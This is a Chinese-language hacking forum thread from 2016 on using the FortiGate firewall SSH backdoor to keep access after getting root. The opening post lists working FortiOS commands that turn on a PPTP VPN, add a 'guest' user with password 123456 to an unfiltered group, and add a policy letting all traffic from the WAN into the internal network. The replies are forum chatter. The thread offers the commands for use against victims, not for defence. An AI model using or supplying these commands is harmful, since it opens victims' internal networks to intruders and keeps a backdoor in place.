飞塔SSH后门 进一步利用方法
最近这个漏洞很火啊!:lol
因为这个漏洞获取到的直接就是防火墙的root权限。所以我们给自己开个vpn然后你想干啥就干啥呗。还不懂?去翻用户手册。
查看用户组
show user group
开启vpn代码。
config vpn pptp
set status enable
set eip 192.168.200.100
set sip 192.168.200.1
set usrgrp Guest-group
end
config user local
edit "guest"
set type password
set passwd 123456
next
end
config user group
edit "Guest-group"
set profile "unfiltered"
set member "guest"
next
end
config firewall policy
edit 9
set srcintf "wan1"
set dstintf "internal"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
next
end 666666
LangDao 发表于 2016-1-15 19:27 static/image/common/back.gif
666666
没意思,分享东西都没人看,以后不分享了
额其实有人看,为了尊重劳动成果,建议还是带上VIA Antergone 发表于 2016-1-16 00:03 static/image/common/back.gif
额其实有人看,为了尊重劳动成果,建议还是带上VIA
via 啥玩意
Antergone 发表于 2016-1-16 00:03 static/image/common/back.gif
额其实有人看,为了尊重劳动成果,建议还是带上VIA
主要是没人出来讨论
看不懂;P tx1 发表于 2016-1-16 01:16
主要是没人出来讨论
其实很简单,就是通过remote连接之后,在上面执行cli命令就好了。
你在上面列出来的都是命令啊 就类似你在linux的terminal 执行 adduser addgroup一样
页:
[1]